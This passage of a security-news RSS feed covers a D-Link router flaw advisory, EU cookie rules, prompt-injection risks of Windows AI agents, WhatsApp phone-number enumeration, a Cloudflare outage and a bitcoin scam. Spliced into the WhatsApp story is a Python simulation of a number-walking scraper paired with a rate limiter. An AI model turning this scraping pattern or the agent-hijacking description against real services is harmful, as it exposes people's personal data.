</p>

<p>
	Microsoft has acknowledged the vulnerability and has successfully deployed security patches to address the flaw, so make sure your PC is fully updated.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.howtogeek.com/windows-11-has-a-massive-kernel-vulnerability/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">32561</guid><pubDate>Thu, 20 Nov 2025 23:10:05 +0000</pubDate></item><item><title>D-Link warns of new RCE flaws in end-of-life DIR-878 routers</title><link>https://nsaneforums.com/news/security-privacy-news/d-link-warns-of-new-rce-flaws-in-end-of-life-dir-878-routers-r32551/</link><description><![CDATA[<p>
	D-Link is warning of three remotely exploitable command execution vulnerabilities that affect all models and hardware revisions of its DIR-878 router, which has reached end-of-service but is still available in several markets.
</p>

<p>
	 
</p>

<p>
	Technical details and proof-of-concept (PoC) exploit code demonstrating the vulnerabilities have been published by a researcher using the name <a href="https://github.com/yifan20020708" rel="external nofollow" target="_blank">Yangyifan</a>.
</p>

<p>
	 
</p>

<p>
	Typically used in homes and small offices, the <a href="https://legacy.us.dlink.com/pages/product.aspx?id=99081ddbf70c4c21a387ab599e50d848" rel="external nofollow" target="_blank">DIR-878</a> was hailed as a high-performance dual-band wireless router when it launched in 2017.
</p>

<p>
	 
</p>

<p>
	Even if the device is no longer supported, it can still be purchased new or used for prices between $75 and $122.
</p>

<p>
	 
</p>

<p>
	However, since the DIR-878 reached end-of-life (EoL) in 2021, D-Link warned that it will not release security updates for this model and recommends replacing it with an actively supported product.
</p>

<p>
	 
</p>

<p>
	In total, D-Link's <a href="http://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10475" rel="external nofollow" target="_blank">security advisory</a> lists four vulnerabilities, only one of them requiring physical access or control over a USB device for exploitation.
</p>

<p>
	 
</p>

<ul>
	<li>
		<strong>CVE-2025-60672 </strong>– Remote unauthenticated command execution via SetDynamicDNSSettings parameters stored in NVRAM and used in system commands.
	</li>
	<li>
		<strong>CVE-2025-60673</strong> – Remote unauthenticated command execution via SetDMZSettings and unsanitized IPAddress value injected into iptables commands.
	</li>
	<li>
		<strong>CVE-2025-60674</strong> – Stack overflow in USB storage handling due to oversized “Serial Number” field (physical or USB-device-level attack).
	</li>
	<li>
		<strong>CVE-2025-60676</strong> – Arbitrary command execution via unsanitized fields in /tmp/new_qos.rule, processed by binaries using system().
	</li>
</ul>

<p>
	 
</p>

<p>
	Despite the vulnerabilities being remotely exploitable and exploit code already being publicly available, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has assessed them as medium severity.
</p>

<p>
	 
</p>

<p>
	However, a publicly available exploit typically captures threat actors' attention, especially botnet operators, who usually include them in their arsenal to expand targeting.
</p>

<p>
	 
</p>

<p>
	For instance, the large-scale botnet RondoDox uses more than <a href="https://www.bleepingcomputer.com/news/security/rondodox-botnet-targets-56-n-day-flaws-in-worldwide-attacks/" rel="external nofollow" target="_blank">56 known flaws</a>, some affecting D-Link devices, and keeps <a href="https://www.bleepingcomputer.com/news/security/rondodox-botnet-malware-now-hacks-servers-using-xwiki-flaw/" rel="external nofollow" target="_blank">adding more</a> of them.
</p>

<p>
	 
</p>

<p>
	More recently, BleepingComputer reported on the Aisuru botnet, which launched a massive distributed denial-of-service (DDoS) attack against Microsoft's Azure network, sending <a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-aisuru-botnet-used-500-000-ips-in-15-tbps-azure-ddos-attack/" rel="external nofollow" target="_blank">15.72 terabits per second</a> (Tbps) from over 500,000 IP addresses.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/d-link-warns-of-new-rce-flaws-in-end-of-life-dir-878-routers/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">

<p>
	<span style="font-size:12px;"><em>Posted Friday 21 November 2025 at 3:42 am AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">32551</guid><pubDate>Thu, 20 Nov 2025 17:45:09 +0000</pubDate></item><item><title>Europe&#x2019;s cookie nightmare is crumbling</title><link>https://nsaneforums.com/news/security-privacy-news/europe%E2%80%99s-cookie-nightmare-is-crumbling-r32548/</link><description><![CDATA[<div>
	<p>
		 
	</p>
</div>


<p>
	Tom Warren
</p>

<div>
	<span>Nov 19, 2025, 8:28 AM EST</span>
</div>

<p>
	 
</p>

<p>
	 
</p>

<div>
	<p>
		The EU’s cookie consent policies have been an <a href="https://www.theverge.com/2020/5/7/21250300/eu-cookie-consent-policy-updated-guidelines-cookie-wall" rel="external nofollow">annoying and unavoidable</a> part of browsing the web in Europe since their introduction in 2018.
	</p>

	<p>
		 
	</p>

	<p>
		But the cookie nightmare is about to crumble thanks to some big proposed changes <a href="https://www.theverge.com/news/823750/european-union-ai-act-gdpr-changes" rel="external nofollow">announced by the European Commission today</a>.
	</p>
</div>

<div>
	<p>
		 
	</p>

	<p>
		Instead of having to click accept or reject on a cookie pop-up for every website you visit in Europe, the EU is preparing to enforce rules that will allow users to set their preferences for cookies at the browser level. “People can set their privacy preferences centrally — for example via the browser — and websites must respect them,” says the EU. “This will drastically simplify users’ online experience.”
	</p>
</div>

<div>
	<p>
		 
	</p>

	<p>
		This key change is part of a new <a href="https://digital-strategy.ec.europa.eu/en/faqs/digital-package" rel="external nofollow">Digital Package of proposals</a> to simplify the EU’s digital rules, and will initially see cookie prompts change to be a simplified yes or no single-click prompt ahead of the “technological solutions” eventually coming to browsers.
	</p>

	<p>
		 
	</p>

	<p>
		Websites will be required to respect cookie choices for at least six months, and the EU also wants website owners to not use cookie banners for “harmless uses” like counting website visits, to lessen the amount of pop-ups.
	</p>
</div>

<div>
	<p>
		 
	</p>

	<p>
		The sheer amount of cookie pop-ups across Europe means people often just click any button to get access to a website, simply because of the annoyance instead of worrying about their privacy.
	</p>

	<p>
		 
	</p>

	<p>
		“This is not a real choice made by citizens to protect their phones or computers and to choose what happens to their data,” says the European Commission.
	</p>

	<p>
		 
	</p>

	<p>
		“Today’s proposal modernizes the ‘cookies rules’, with the same strong protections for devices, allowing citizens to decide what cookies are placed on their connected devices (e.g. phones or computers) and what happens to their data.”
	</p>
</div>

<div>
	<p>
		 
	</p>

	<p>
		The EU’s latest proposals will now head to the European Parliament. They’ll need to be approved by the EU’s 27 member states during a process that could take some time yet, but Europe’s cookie nightmare looks a big step closer to being over.
	</p>

	<p>
		 
	</p>

	<p>
		<a href="https://www.theverge.com/news/823788/europe-cookie-prompt-browser-changes-proposal?utm_source=simpleanalytics.com" rel="external nofollow">Source</a>
	</p>
</div>
]]></description><guid isPermaLink="false">32548</guid><pubDate>Thu, 20 Nov 2025 09:58:50 +0000</pubDate></item><item><title>Microsoft tries to head off the &#x201C;novel security risks&#x201D; of Windows 11 AI agents</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-tries-to-head-off-the-%E2%80%9Cnovel-security-risks%E2%80%9D-of-windows-11-ai-agents-r32523/</link><description><![CDATA[<h3>
	Agents with read/write access to your files create big security, privacy issues.
</h3>

<p>
	Microsoft has been adding AI features to Windows 11 for years, but things have recently entered a new phase, with both generative and so-called “agentic” AI features working their way <a href="https://arstechnica.com/gadgets/2025/10/microsofts-vision-for-ai-pcs-looks-a-lot-like-another-crack-at-cortana/" rel="external nofollow">deeper into the bedrock</a> of the operating system. A new build of Windows 11 released to Windows Insider Program testers yesterday includes a new “experimental agentic features” toggle in the Settings to support a feature called Copilot Actions, and Microsoft has <a href="https://support.microsoft.com/en-us/windows/experimental-agentic-features-a25ede8a-e4c2-4841-85a8-44839191dfb3" rel="external nofollow">published a detailed support article</a> detailing more about just how those “experimental agentic features” will work.
</p>

<p>
	 
</p>

<p>
	If you’re not familiar, “agentic” is a buzzword that Microsoft has used repeatedly to describe its future ambitions for Windows 11—in plainer language, these agents are meant to accomplish assigned tasks in the background, allowing the user’s attention to be turned elsewhere. Microsoft says it wants agents to be capable of “everyday tasks like organizing files, scheduling meetings, or sending emails,” and that Copilot Actions should give you “an active digital collaborator that can carry out complex tasks for you to enhance efficiency and productivity.”
</p>

<p>
	 
</p>

<p>
	But like other kinds of AI, these agents can be prone to error and confabulations and will often proceed as if they know what they’re doing even when they don’t. They also present, in Microsoft’s own words, “novel security risks,” mostly related to what can happen if an attacker is able to give instructions to one of these agents. As a result, Microsoft’s implementation walks a tightrope between giving these agents access to your files and cordoning them off from the rest of the system.
</p>

<h2>
	Possible risks and attempted fixes
</h2>

<figure class="ars-wp-img-shortcode id-2128140 align-fullwidth">
	<div>
		<img alt="AIComponents-11-17-1024x809.png" class="ipsImage" decoding="async" height="720" width="720" src="https://cdn.arstechnica.net/wp-content/uploads/2025/11/AIComponents-11-17-1024x809.png">
	</div>

	<figcaption>
		<div class="caption font-impact dusk:text-gray-300 mb-4 mt-2 inline-flex flex-row items-stretch gap-1 text-base leading-tight text-gray-400 dark:text-gray-300">
			<div class="caption-content">
				<em>For now, these “experimental agentic features” are optional, only available in early test builds of Windows 11, and off by default.</em>
			</div>

			<div class="caption-content">
				<em><span class="caption-credit mt-2 text-xs"><em>Credit: Microsoft </em></span> </em>
			</div>
		</div>
	</figcaption>
</figure>

<p>
	For example, AI agents running on a PC will be given their own user accounts separate from your personal account, ensuring that they don’t have permission to change <em>everything</em> on the system and giving them their own “desktop” to work with that won’t interfere with what you’re working with on your screen. Users need to approve requests for their data, and “all actions of an agent are observable and distinguishable from those taken by a user.” Microsoft also says agents need to be able to produce logs of their activities and “should provide a means to supervise their activities,” including showing users a list of actions they’ll take to accomplish a multi-step task.
</p>

<p>
	 
</p>

<p>
	But these safeguards and monitoring capabilities don’t change the fact that you’re exposing yourself to privacy and security risks by using AI agents. They’ll be able to request read and write access to most of the files in your user account—by default, anything in the Documents, Downloads, Desktop, Music, Pictures, and Videos folders. They’ll have access to any apps that have been installed for all users on the PC (apps that have only been installed in your user account won’t be accessible to the agent, and it will also be possible for users to install apps that only their agents can access.) And agents can potentially be vulnerable to hijacking that exposes your data to attackers—Microsoft specifically mentions “cross-prompt injection (XPIA), where malicious content embedded in UI elements or documents can override agent instructions, leading to unintended actions like data exfiltration or malware installation.”
</p>

<p>
	 
</p>

<p>
	For now, these features can be switched off with the Settings toggle and are off by default. That concession to user preference—plus the lengthy support document outlining the risks and the precautions Microsoft has tried to build into the system—at least suggests that Microsoft has learned lessons from its botched rollout of <a href="https://arstechnica.com/gadgets/2025/04/in-depth-with-windows-11-recall-and-what-microsoft-has-and-hasnt-fixed/" rel="external nofollow">the data-scraping Windows Recall feature</a> last year.
</p>

<p>
	 
</p>

<p>
	Hopefully these features remain fully off by default when they start rolling out to the general public. If not, they risk becoming <a href="https://arstechnica.com/gadgets/2025/11/what-i-do-to-clean-up-a-clean-install-of-windows-11-23h2-and-edge/" rel="external nofollow">one more of the many things</a> you need to change or turn off in a modern Windows 11 installation if you want to keep the operating system’s various cloud and AI offerings out of your way.
</p>

<p>
	 
</p>

<p>
	Alongside these upcoming AI agents, Microsoft is also attempting to make Copilot more “<a href="https://arstechnica.com/gadgets/2025/10/microsoft-makes-copilot-human-centered-with-a-90s-style-animated-assistant/" rel="external nofollow">human-centered</a>” and approachable, adding a Clippy-esque <a href="https://arstechnica.com/ai/2025/10/microsofts-mico-heightens-the-risks-of-parasocial-llm-relationships/" rel="external nofollow">animated character</a> named “Mico” and improving its ability to understand voice input as well as typical mouse-and-keyboard requests.
</p>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/gadgets/2025/11/new-windows-11-ai-agents-can-work-in-the-background-but-create-new-security-risks/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Wednesday 19 November 2025 at 4:36 pm AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of October): 5,009</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">32523</guid><pubDate>Wed, 19 Nov 2025 06:37:25 +0000</pubDate></item><item><title>A Simple WhatsApp Security Flaw Exposed 3.5 Billion Phone Numbers</title><link>https://nsaneforums.com/news/security-privacy-news/a-simple-whatsapp-security-flaw-exposed-35-billion-phone-numbers-r32520/</link><description><![CDATA[<h3>
	By plugging tens of billions of phone numbers into WhatsApp’s contact discovery tool, researchers found “the most extensive exposure of phone numbers” ever—along with profile photos and more.
</h3>

<p>
	<span class="lead-in-text-callout">WhatsApp's mass adoption</span> stems in part from how easy it is to find a new contact on the messaging platform: Add someone's phone number, and <a href="https://www.wired.com/story/whatsapp-private-processing-generative-ai-security-risks/" rel="external nofollow">WhatsApp</a> instantly shows whether they're on the service, and often their profile picture and name, too.
</p>

<p>
	 
</p>

<p>
	Repeat that same trick a few billion times with every possible phone number, it turns out, and the same feature can also serve as a convenient way to obtain the cell number of virtually every WhatsApp user on earth—along with, in many cases, profile photos and text that identifies each of those users. The result is a sprawling exposure of personal information for a significant fraction of the world population.
</p>

<p>
	 
</p>

<p>
	A group of Austrian researchers has now shown that they were able to use that simple method, checking every possible number against WhatsApp's contact discovery, to extract 3.5 billion users’ phone numbers from the messaging service. For about 57 percent of those users, they could also access profile photos, and for another 29 percent, the text on their profiles. Despite a previous warning about WhatsApp's exposure of this data from a different researcher in 2017, they say, the service's parent company, Meta, still failed to limit the speed or number of contact discovery requests the researchers could make by interacting with WhatsApp's browser-based app, allowing them to check roughly a hundred million numbers an hour.
</p>

<p>
	 
</p>

<p>
	The result would be “the largest data leak in history, had it not been collated as part of a responsibly conducted research study,” as the researchers describe it in a <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://github.com/sbaresearch/whatsapp-census/blob/main/Hey_there_You_are_using_WhatsApp.pdf" href="https://github.com/sbaresearch/whatsapp-census/blob/main/Hey_there_You_are_using_WhatsApp.pdf" rel="external nofollow" target="_blank">paper documenting their findings</a>.
</p>

<p>
	 
</p>

<p>
	“To the best of our knowledge, this marks the most extensive exposure of phone numbers and related user data ever documented,” says Aljosha Judmayer, one of the researchers at the University of Vienna who worked on the study.
</p>

<p>
	 
</p>

<p>
	The researchers say they warned Meta about their findings in April and deleted their copy of the 3.5 billion phone numbers. By October, the company had fixed the enumeration problem by enacting a stricter “rate-limiting” measure that prevents the mass-scale contact discovery method the researchers used. But until then, the data exposure could have also been exploited by anyone else using the same scraping technique, adds Max Günther, another researcher from the university who cowrote the paper. “If this could be retrieved by us super easily, others could have also done the same," he says.
</p>

<p>
	 
</p>

<p>
	In a statement to WIRED, Meta thanked the researchers, who reported their discovery through Meta's “bug bounty” system, and described the exposed data as “basic publicly available information,” since profile photos and text weren't exposed for users who opted to make it private. “We had already been working on industry-leading anti-scraping systems, and this study was instrumental in stress-testing and confirming the immediate efficacy of these new defenses,” writes Nitin Gupta, vice president of engineering at WhatsApp. Gupta adds, “We have found no evidence of malicious actors abusing this vector. As a reminder, user messages remained private and secure thanks to WhatsApp’s default end-to-end encryption, and no non-public data was accessible to the researchers.”
</p>

<p>
	 
</p>

<p>
	Despite Meta's description, the researchers say they didn't circumvent or even encounter any “defenses” in collecting the phone numbers. Nor is their work the first time that WhatsApp has been warned about its exposure of phone numbers and associated profile data. Fully eight years ago, in 2017, Dutch researcher Loran Kloeze wrote a <a href="https://web.archive.org/web/20200108081933/https://www.lorankloeze.nl/2017/05/07/collecting-huge-amounts-of-data-with-whatsapp/" rel="external nofollow">blog post</a> pointing out that the phone number enumeration technique was possible and that it could be used to obtain phone numbers, profile photos, and also the times when a user was online.
</p>

<p>
	 
</p>

<p>
	Kloeze described a scenario in which the data exposure could be combined with face recognition to create a giant database of personally identifiable information. “Now that is quite scary, isn’t it?” he wrote. Meta, then Facebook, responded to his findings, arguing that WhatsApp's privacy settings were still working as designed—users can choose to make their profile information accessible only to their chosen contacts—and even told him he wasn’t eligible for a bug bounty reward for his work at the time.
</p>

<p>
	 
</p>

<p>
	When WIRED asked Meta what rate-limiting measures it instituted over the last eight years to prevent the technique Kloeze demonstrated, the company responded that it has, in fact, implemented evolving defenses against scrapers, including rate-limiting and machine-learning techniques to ban scrapers. Yet the University of Vienna researchers were able to not only replicate Kloeze's work, but take it further, actually enumerating all 3.5 billion registered WhatsApp phone numbers—far more than the service had in 2017. They also addressed WhatsApp's argument about privacy settings by measuring how many users publicly exposed personal information in their profiles, breaking down the results by country. They found that 44 percent of the 137 million phone numbers they collected for Americans displayed photos, and 33 percent showed public “about” text, for instance.
</p>

<p>
	 
</p>

<p>
	For countries where WhatsApp is even more widely used, a smaller fraction of the population turned on its privacy settings: In India, where the researchers counted nearly 750 million numbers, 62 percent of accounts publicly displayed a profile photo. For the 206 million Brazilian numbers they found, 61 percent had profile photos exposed.
</p>

<p>
	 
</p>

<p>
	The University of Vienna researchers stumbled on WhatsApp's phone number enumeration problem last year, when they were testing what they could learn from the service about users despite its end-to-end encryption for messages, such as the times when a user is connecting from the desktop app versus the mobile one. They found that the app didn't appear to have any obvious rate-limiting protection, so they tried simply enumerating all US numbers. “In a half hour, we had like 30 million US-based numbers,” says Gabriel Gegenhuber, one of the University of Vienna researchers. “So we were kind of surprised. And then we just kept going.”
</p>

<p>
	 
</p>

<p>
	One interested audience for the exposed phone number data, the researchers point out, would be scammers and spammers who are seeking a database of potential targets. But the researchers also found millions of phone numbers registered to WhatsApp in countries where it's officially banned, including 2.3 million in China and 1.6 million in Myanmar. Those countries' governments could have used WhatsApp's exposure to collect those numbers and hunt down illegal app users, the researchers point out. Muslims in China, according to <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://www.businessinsider.com/china-uyghur-muslim-women-detained-precrimes-facebook-whatsapp-google-gmail-2021-10" href="https://www.businessinsider.com/china-uyghur-muslim-women-detained-precrimes-facebook-whatsapp-google-gmail-2021-10" rel="external nofollow" target="_blank">some reports</a>, have been detained merely for having WhatsApp installed on their phones.
</p>

<p>
	 
</p>

<p>
	The University of Vienna researchers also analyzed the public keys advertised by the 3.5 billion accounts they found exposed via their enumeration method, the long strings of characters that WhatsApp's end-to-end encryption protocol uses so that others can encrypt messages to an account. They found that a surprising number of accounts presented duplicate keys, a security issue because two accounts advertising the same public key almost certainly share the private key, so whoever holds it could decrypt messages sent to either of them.
</p>

<p>
	 
</p>

<p>
	Some keys were reused hundreds of times, they found, and 20 US numbers used a key of all zeroes, strangely. The researchers speculate, though, that the key duplication was likely the result of unauthorized WhatsApp clients, rather than a flaw in WhatsApp itself. On closer examination of some of the accounts with repeated cryptographic keys, they also noted that they looked like scammer accounts, suggesting that some scam operations that exploit WhatsApp may use a client with broken encryption features.
</p>

<p>
	 
</p>

<p>
	Aside from the lack of rate limiting, the researchers argue that their findings point to a more fundamental issue with services like WhatsApp: phone numbers, they say, have far too little entropy to serve as an unguessable account identifier for a service with billions of users, because the entire number space can simply be walked. That leaves rate limiting as the only available measure to prevent user data from being scraped en masse, and one that will never fully close the leak as long as WhatsApp prioritizes convenient contact discovery for users. (WhatsApp has, in fact, started testing a <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://wabetainfo.com/whatsapp-is-working-on-a-new-username-reservation-system-for-upcoming-early-access/" href="https://wabetainfo.com/whatsapp-is-working-on-a-new-username-reservation-system-for-upcoming-early-access/" rel="external nofollow" target="_blank">username feature in beta</a>, which may offer a better approach to privacy.)
</p>
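<p>
	Added example, not from the researchers' paper or from WhatsApp's own code: a constructed contact-discovery endpoint, a scraper that walks a number range the way the enumeration above did, and the per-client sliding-window rate limiter the article names as the only available countermeasure. The registry contents, client names, window sizes and lookup rates are all assumptions; the entropy helper shows why a 10-digit number is discoverable rather than secret at the reported hundred-million-lookups-per-hour pace.
</p>

```python
import math
from collections import deque

# Constructed sample registry standing in for WhatsApp's user base (not real numbers).
REGISTERED = {"+14155550101", "+14155550137", "+14155550199"}


def candidate_space_bits(digits: int) -> float:
    """Entropy, in bits, of a uniformly random identifier with this many decimal digits.
    A 10-digit national number is about 33 bits: far below anything that could be
    treated as a secret."""
    return math.log2(10 ** digits)


def hours_to_exhaust(digits: int, lookups_per_hour: float) -> float:
    """Wall-clock hours an unthrottled scraper needs to test every number once."""
    return 10 ** digits / lookups_per_hour


class SlidingWindowLimiter:
    """Per-client limiter: at most `limit` lookups in any `window`-second span.
    Hypothetical implementation, not WhatsApp's."""

    def __init__(self, limit: int, window: float):
        self.limit, self.window = limit, window
        self._hits: dict[str, deque] = {}

    def allow(self, client: str, now: float) -> bool:
        q = self._hits.setdefault(client, deque())
        while q and now - q[0] >= self.window:   # drop timestamps outside the window
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


def contact_discovery(number: str, client: str, now: float, limiter=None) -> str:
    """Simulated discovery endpoint: 'registered', 'unknown' or 'throttled'."""
    if limiter is not None and not limiter.allow(client, now):
        return "throttled"
    return "registered" if number in REGISTERED else "unknown"


def enumerate_prefix(prefix: str, count: int, client: str, limiter=None,
                     rate_per_sec: float = 1000.0):
    """Walk `count` consecutive 4-digit suffixes under `prefix` at `rate_per_sec`
    lookups per second, as a scraper would. Returns (registered_numbers, throttled)."""
    found, throttled = [], 0
    for i in range(count):
        number = f"{prefix}{i:04d}"
        verdict = contact_discovery(number, client, now=i / rate_per_sec, limiter=limiter)
        if verdict == "registered":
            found.append(number)
        elif verdict == "throttled":
            throttled += 1
    return found, throttled


if __name__ == "__main__":
    # Unthrottled: every registered number in the range is recovered.
    print(enumerate_prefix("+1415555", 200, "scraper"))
    # 50 lookups per minute per client: the same scan is cut off almost immediately.
    print(enumerate_prefix("+1415555", 200, "scraper", SlidingWindowLimiter(50, 60.0)))
    print(candidate_space_bits(10), hours_to_exhaust(10, 1e8))
```

<p>
	The limiter is keyed on a client identity, which is the weak point in practice: a scraper that can cheaply mint new client sessions sidesteps a per-client window, so the key usually has to combine several signals (account, device, IP range) and be backed by the kind of behavioural scoring Meta describes.
</p>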

<p>
	 
</p>

<p>
	“Phone numbers were not designed to be used as secret identifiers for accounts, but that's how they're used in practice,” says Judmayer. “If you have a big service that's used by more than a third of the world population, and this is the discovery mechanism, that's a problem.”
</p>

<p>
	 
</p>

<p>
	<a href="https://www.wired.com/story/a-simple-whatsapp-security-flaw-exposed-billions-phone-numbers/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">

<p>
	<span style="font-size:12px;"><em>Posted Wednesday 19 November 2025 at 5:48 am AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">32520</guid><pubDate>Tue, 18 Nov 2025 19:49:26 +0000</pubDate></item><item><title>Cloudflare Outage Takes Down ChatGPT, Uber, X, More. Here's What Happened</title><link>https://nsaneforums.com/news/security-privacy-news/cloudflare-outage-takes-down-chatgpt-uber-x-more-heres-what-happened-r32509/</link><description><![CDATA[<p>
	<span style="font-size:16px;">Web users woke up to spotty service and connection errors across major platforms. Cloudflare blames a routine configuration change that tripped a 'latent bug' in its bot-mitigation service.</span>
</p>

<p>
	 
</p>

<p>
	<strong>UPDATE 11:25AM:</strong> Cloudflare's CTO is blaming "a latent bug in a service underpinning our bot mitigation capability" for today's outage. It "started to crash after a routine configuration change we made," which "cascaded into a broad degradation to our network and other services."
</p>

<p>
	 
</p>

<p>
	Dane Knecht stressed that this was "not an attack," and "work is already underway to make sure it does not happen again." He promised to share more details in a few hours.
</p>

<p>
	 
</p>

<p>
	"I won’t mince words: earlier today we failed our customers and the broader Internet when a problem in @Cloudflare network impacted large amounts of traffic that rely on us," he added. "The sites, businesses, and organizations that rely on Cloudflare depend on us being available and I apologize for the impact that we caused."
</p>

<p>
	 
</p>

<p>
	<strong>UPDATE 9:50AM:</strong> "A fix has been implemented and we believe the incident is now resolved. We are continuing to monitor for errors to ensure all services are back to normal," Cloudflare says.
</p>

<p>
	 
</p>

<p>
	<strong>UPDATE 9AM:</strong> Cloudflare says a "fix is being implemented" for the issue causing outages. "We are continuing to monitor for errors to ensure all services are back to normal," it said at 8:10 a.m. EST.
</p>

<p>
	 
</p>

<p>
	Still, as more people wake up and try to sign on to various platforms, reports on Downdetector have increased substantially. Users are having issues on Canva, ChatGPT, Claude, Doordash, Grindr, Indeed, Truth Social, Uber, X, Zoom, and more. It's not confirmed that all of these issues are Cloudflare-related, but it's likely, as many reports spiked around 8:30 a.m. EST.
</p>

<p>
	 
</p>

<p>
	"We are continuing [to work] on restoring service for application services customers," Cloudflare said at 8:59 a.m. EST.
</p>

<p>
	 
</p>

<p>
	<strong>Original Story:</strong>
</p>

<p>
	 
</p>

<p>
	Struggling to access websites or apps? It may be because of an outage of Cloudflare services, which is impacting third-party tools like ChatGPT and X.
</p>

<p>
	 
</p>

<p>
	As reported by users on Downdetector, Cloudflare first experienced issues at 6:15 a.m. EST on Tuesday, Nov. 18. The brand acknowledged problems, saying, “Cloudflare is aware of, and investigating an issue which impacts multiple customers.”
</p>

<p>
	 
</p>

<p>
	Many websites have widespread 500 errors. So far, outages are confirmed for social media network X, OpenAI's ChatGPT, and film review platform Letterboxd. 
</p>

<p>
	 
</p>

<p>
	On its status website, OpenAI said, "We have confirmed that the incident is caused by an issue with one of our third-party service providers. We will provide updates as they become available." There are also issues with its APIs and video-generation platform Sora.
</p>

<p>
	 
</p>

<p>
	At 7:20 a.m. EST, Cloudflare announced that it was beginning to see services recover, although it noted, “Customers may continue to observe higher-than-normal error rates as we continue remediation efforts.” The brand has since said it is "continuing to investigate this issue."
</p>

<p>
	 
</p>

<p>
	Last month, a major Amazon Web Services outage saw over 2,000 websites and apps taken offline for hours. The company later confirmed that the issues stemmed from a “latent defect” in its largest region, US-East-1.
</p>

<p>
	 
</p>

<p>
	Spotify’s mobile app has also been experiencing issues today, with some users finding that playing a podcast makes both the Android and iOS apps crash.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.pcmag.com/news/cloudflare-outage-takes-down-chatgpt-uber-x-more-heres-what-happened" rel="external nofollow">Source </a></strong>
</p>
]]></description><guid isPermaLink="false">32509</guid><pubDate>Tue, 18 Nov 2025 18:08:21 +0000</pubDate></item><item><title>Inside a Wild Bitcoin Heist: Five-Star Hotels, Cash-Stuffed Envelopes, and Vanishing Funds</title><link>https://nsaneforums.com/news/security-privacy-news/inside-a-wild-bitcoin-heist-five-star-hotels-cash-stuffed-envelopes-and-vanishing-funds-r32497/</link><description><![CDATA[<h3>
	Sophisticated crypto scams are on the rise. But few of them go to the lengths one bitcoin mining executive experienced earlier this year.
</h3>

<p>
	<span class="lead-in-text-callout">As Kent Halliburton</span> stood in a bathroom at the Rosewood Hotel in central Amsterdam, thousands of miles from home, running his fingers through an envelope filled with €10,000 in crisp banknotes, he started to wonder what he had gotten himself into.
</p>

<p>
	 
</p>

<p>
	Halliburton is the cofounder and CEO of Sazmining, a company that operates <a href="https://www.wired.com/story/the-worlds-biggest-bitcoin-mine-is-rattling-this-texas-oil-town/" rel="external nofollow">bitcoin mining hardware</a> on behalf of clients—a model known as “mining-as-a-service.” Halliburton is based in Peru, but Sazmining runs mining hardware out of third-party data centers across Norway, Paraguay, Ethiopia, and the United States.
</p>

<p>
	 
</p>

<p>
	As Halliburton tells it, he had flown to Amsterdam the previous day, August 5, to meet Even and Maxim, two representatives of a wealthy Monaco-based family. The family office had offered to purchase hundreds of bitcoin mining rigs from Sazmining—around $4 million worth—which the company would install at a facility currently under construction in Ethiopia. Before finalizing the deal, the family office had asked to meet Halliburton in person.
</p>

<p>
	 
</p>

<p>
	When Halliburton arrived at the Rosewood Hotel, he found Even and Maxim perched in a booth. They struck him as playboy, high-roller types—particularly Maxim, who wore a tan three-piece suit and had a highly manicured look, his long dark hair parted down the middle. A Rolex protruded from the cuff of his sleeve.
</p>

<p>
	 
</p>

<p>
	Over a three-course lunch—ceviche with a roe garnish, Chilean sea bass, and cherry cake—they discussed the contours of the deal and traded details about their respective backgrounds. Even was talkative and jocular, telling stories about blowout parties in Marrakech. Maxim was aloof; he mostly stared at Halliburton, holding his gaze for long periods at a time as though sizing him up.
</p>

<p>
	 
</p>

<p>
	As a relationship-building exercise, Even proposed that Halliburton sell the family office around $3,000 in bitcoin. Halliburton was initially hesitant, but chalked it up as a peculiar dating ritual. One of the guys slid Halliburton the cash-filled envelope and told him to go to the bathroom, where he could count out the amount in private. “It felt like something out of a James Bond movie,” says Halliburton. “It was all very exotic to me.”
</p>

<p>
	 
</p>

<p>
	Halliburton left in a taxi, somewhat bemused by the encounter, but otherwise hopeful of closing the deal with the family office. For Sazmining, a small company with around 15 employees, it promised to be transformative.
</p>

<p>
	 
</p>

<p>
	Less than two weeks later, Halliburton had lost more than $200,000 worth of bitcoin to Even and Maxim. He didn’t know whether Sazmining could survive the blow, nor how the scammers had ensnared him.
</p>

<p>
	 
</p>

<p>
	<span class="lead-in-text-callout">Directly after his</span> lunch with Even and Maxim, Halliburton flew to Latvia for a Bitcoin conference. From there, he traveled to Ethiopia to check on construction work at the data center facility.
</p>

<p>
	 
</p>

<p>
	While Halliburton was in Ethiopia, he received a WhatsApp message from Even, who wanted to go ahead with the deal on one condition: that Sazmining sell the family office a larger amount of bitcoin as part of the transaction, after the small initial purchase at the Rosewood Hotel. They landed on $400,000 worth—a tenth of the overall deal value.
</p>

<p>
	 
</p>

<p>
